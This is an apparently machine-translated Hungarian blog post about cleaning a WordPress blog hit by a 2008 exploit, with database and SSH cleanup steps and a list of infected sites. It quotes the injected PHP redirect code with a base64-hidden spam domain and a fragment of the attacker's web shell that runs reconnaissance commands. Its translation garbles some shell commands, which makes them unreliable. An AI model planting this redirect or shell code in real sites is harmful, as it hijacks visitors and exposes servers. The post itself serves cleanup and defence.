Vírusos blogoszféra ... de mi volt velem?

Az elmúlt hónapban, kaptam figyelmeztetést vírus blog Egyes látogatók. Kezdetben figyelmen kívül hagyta a figyelmeztetéseket, mert telepített egy nagyon jó víruskereső (Kaspersky AV 2009), És bár a blog hosszú idő, én soha nem kaptam egy vírus figyelmeztetés (.. láttam valamit gyanús korábban, hogy az első frissítés eltűnt. Végül ...).
Lassan kezdtek megjelenni a nagy eltérések látogatói forgalmatEzt követően a forgalom az utóbbi időben folyamatosan csökken, és kezdett egyre több ember, akik azt mondják, hogy stealthsettings.com van virused. Tegnap kaptam valakitől egy screenshot tenni, ha a víruskereső blokkolja a forgatókönyv -tól stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Ez elég meggyőző számomra, hogy az összes forrásból keresni. Az első gondolat, hogy jutott eszembe volt, hogy frissítés a legfrissebb WordPress (2.5.1), de nem azelőtt, hogy törölné az összes fájlt a régi szkriptből WordPress és elkészíteni biztonsági adatbázis. Ez az eljárás nem működött, és valószínűleg hosszú időbe telt, mire rájöttem, hol van a hiba, ha nem árulta el. Eugen a vita egy kávé, talált link A Google és jó lenne látni.
A MyDigitalLife.info cikket tett közzé: “WordPress Feltörés: Helyezze vissza és javítsa ki a Google-t és a keresőmotort vagy a cookie-forgalmat nem irányítja át a Your-Needs.info, az AnyResults.Net, a Golden-Info.net és más illegális webhelyekre"Ez a végén a menet volt szükségem.
Arról van szó, a kihasználni de WordPress cookie-k alapján, Ami szerintem nagyon bonyolult, és tette a könyvet. Okos elég ahhoz, hogy a SQL Injection Adatbázis a blog, hogy hozzon létre egy láthatatlan felhasználó egy egyszerű rutin ellenőrzés Műszerfal->felhasználók, ellenőrizze a szerver könyvtárakat és fájlokat "írható" (hogy chmod 777), keresni és keresni kivégez fájlok a kiváltságokat a root felhasználó vagy csoport. Nem tudom, akik kihasználják a nevét, és látom, hogy van néhány cikket írt róla, annak ellenére, hogy sok blogot fertőzött, köztük Románia. Ok ... Megpróbálom, hogy megpróbálja elmagyarázni általánosságokat a vírus.

Mi az a vírus?

Először helyezze a forrás oldalon a blogok, linkek láthatatlan a látogatók, de látható és váltólapkás keresők, főleg a Google. Ily módon a át Page Rank az oldalak által megadott támadó. Másodszor egy másik kerül beillesztésre átirányítás kód URL látogató érkezik a Google, Live, Yahoo, ... vagy egy RSS-olvasót, és nem a helyszínen aprósütemény. egy víruskereső érzékeli a átirányítására Trojan-Clicker.HTML.

Tünetek:

Masszív visszaesés látogatói forgalmat, Különösen a blogok, ahol a legtöbb látogató a Google-tól.

Azonosítás: (itt bonyolódik a probléma azok számára, akik nem sokat tudnak a phpmyadmin, php és linux)

LA. FIGYELEM! Először egy biztonsági másolat adatbázisban!

1. Ellenőrizze a forrás fájlokat index.php, header.php, footer.php, A blog témája és nézd meg, van egy kód, amely titkosítást használ base64 vagy az „if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”formátumot tartalmazza:

<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>

... Vagy valami. Törölje ezt a kódot!

Kattints a képre ...

index kód

A fenti képernyőképen véletlenül kiválasztottam és " ". Ennek a kódnak meg kell maradnia.

2. Használat phpMyAdmin és megy az adatbázis tábla wp_usersAhol ellenőrizze, nincs felhasználónév létrehozott 00:00:00 0000-00-00 (Lehetséges elhelyezése user_login írni "WordPress”. Írja le a felhasználói azonosítót (ID mező), majd törölje.

Kattints a képre ...

hamis felhasználói

* A zöld vonal el kell távolítani, és a visszatartott az igazolványát. Abban az esetben, álmosVajon ID = 8 .

3. Menj a táblázat wp_usermeta, Hol található és törlés vonalak azonosító (ahol a terület user_id ID érték megjelenik törlése).

4. Táblázat wp_option, Ugrás active_plugins és mi bővítmény engedélyezve van gyanúsított. Ezt fel lehet használni, mint a vég _old.giff, _old.pngg, _old.jpeg, _new.php.giffstb. gazdag képkiterjesztések kombinációi a _old és _new.

SELECT * FROM wp_options WHERE option_name = 'active_plugins'

Törölje ezt a bővítményt, majd lépjen a blog -> Irányítópult -> Bővítmények oldalra, ahol deaktiválja és aktiválja az összes bővítményt.

Kattints a képre, hogy úgy tűnik, active_plugins vírus fájlt.

csatlakoztat

Kövesd az utat az FTP vagy SSH, megjelölt active_plugins és törölje a fájlt a szerverről.

5. Minden phpMyAdmin, táblázat wp_option, Keresse meg és törölje a sort tartalmazza: "rss_f541b3abd05e7962fcab37737f40fad8"És az"internal_links_cache ".
A internal_links_cache készült titkosított spam linkek jelennek meg a blog, és a kódja Google Adstarkó, A hacker.

6. Javasoljuk, hogy jelszó megváltoztatása Blog és bejelentkezés távolítsa el az összes gyanús userele. Frissítsen a legújabb verzióra WordPress és állítsa be a blogot, hogy ne regisztráljon új felhasználókat. Nincs veszteség… lakatlanként is hozzászólhatnak.

A fentiekben megpróbáltam elmagyarázni egy kicsit, mit kell tennie ilyen helyzetben, hogy megtisztítsam a blogot ettől a vírustól. A probléma sokkal súlyosabb, mint amilyennek látszik, és még közel sem megoldott, mert használják őket biztonsági réseket A webszerver hosting, ami a blog.

Ennek első fokú biztonság, hozzáférési SSH, Hogy néhány ellenőrzést a szerveren, hogy ha azokat a fájlokat, mint a * _old * és * _new. * A befejezés.Giff,. jpeg,. pngg,. jpgg. Ezeket a fájlokat törölni kell. Ha átnevezi a fájlt, például. top_right_old.giff in top_right_old.phpLátjuk, hogy a fájl pontosan exploit kódot szervert.

Néhány hasznos utasítás a szerver ellenőrzéséhez, tisztításához és biztonságához. (SSH-n keresztül)

1.  cd / tmp és ellenőrizze, hogy vannak mappák, mint a tmpVFlma vagy más kombinációk is ugyanaz a neve, és törölje azt. Lásd a lenti képen, két ilyen mappák tőlem:

tmpserver

rm-rf foldername

2. Ellenőrizze és szüntesse meg (módosítsa chmod-ul) lehetőség szerint az attribútumokkal rendelkező mappákat chmod 777

az összes írható fájl megtalálása az aktuális könyvtárban: Keresés. -Type f-perm-2-ls
megtalálni az összes írható könyvtárak a jelenlegi konyvtarban: Keresés. -Type d-perm-2-ls
megtalálja az összes írható könyvtárat és fájlt az aktuális könyvtárban: Keresés. -Perm-2-ls

3. Keresi a gyanús fájlokat a kiszolgálón.

find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"

4, FIGYELEM! A fájlok állították bit SUID si SGID. Ezek a fájlok végre a felhasználó jogosultságával (csoport) vagy gyökér, sem a felhasználó, aki végrehajtja a fájlt. Ezek a fájlok vezethet gyökér kompromisszum, ha biztonsági kérdéseket. Ha a fájlok SUID és SGID bit, végre "chmod 0 " be vagy távolítsa el a csomagot tartalmazó.

Exploit tartalmazza valahol a forrás ...:

if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}

Ily módon ... alapvetően találja megsértése a biztonság. Ports nyitott könyvtárak "írható" és csoportos végrehajtás kiváltságokat fájlok / root.

Vissza több ...

Egyes blogok fertőzött: www.blegoo.com, www.visurat.ro,

fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,

blog.hrmarket.ro, www.nitza.ro,
motorcycles.motomag.ro,

emi.brainient.com, www.picsel.ro,

www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,

www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,

dragos.roua.ro, www.artistul.ro/blog/,

www.mirabilismedia.ro/blog, blog.einvest.ro
... A lista folytatódik ... sokat.

A Google keresőmotorjával ellenőrizheti, hogy egy blog fertőzött-e. másolás beillesztés:

oldal www.blegoo.com vásárolni

Jó éjszakát és jó munkát;) Hamarosan azt hiszem, hogy Eugen hírekkel érkezik, a prevezibil.imprevizibil.com oldalon.

BRB :)

FIGYELEM! A téma megváltoztatása WordPress vagy frissítsen erre WordPress 2.5.1, NEM megoldás a vírus megszabadulására.

Technológiai rajongóként örömmel írok a StealthSettings.com-on 2006 óta. Széles körű tapasztalatom van operációs rendszerekkel: macOS, Windows és Linux, valamint programozási nyelvekkel és blogolási platformokkal (WordPress) és online áruház platformokkal (WooCommerce, Magento, PrestaShop).

Hogyan » figyelemre méltó » Vírusos blogoszféra ... de mi volt velem?
Írj hozzászólást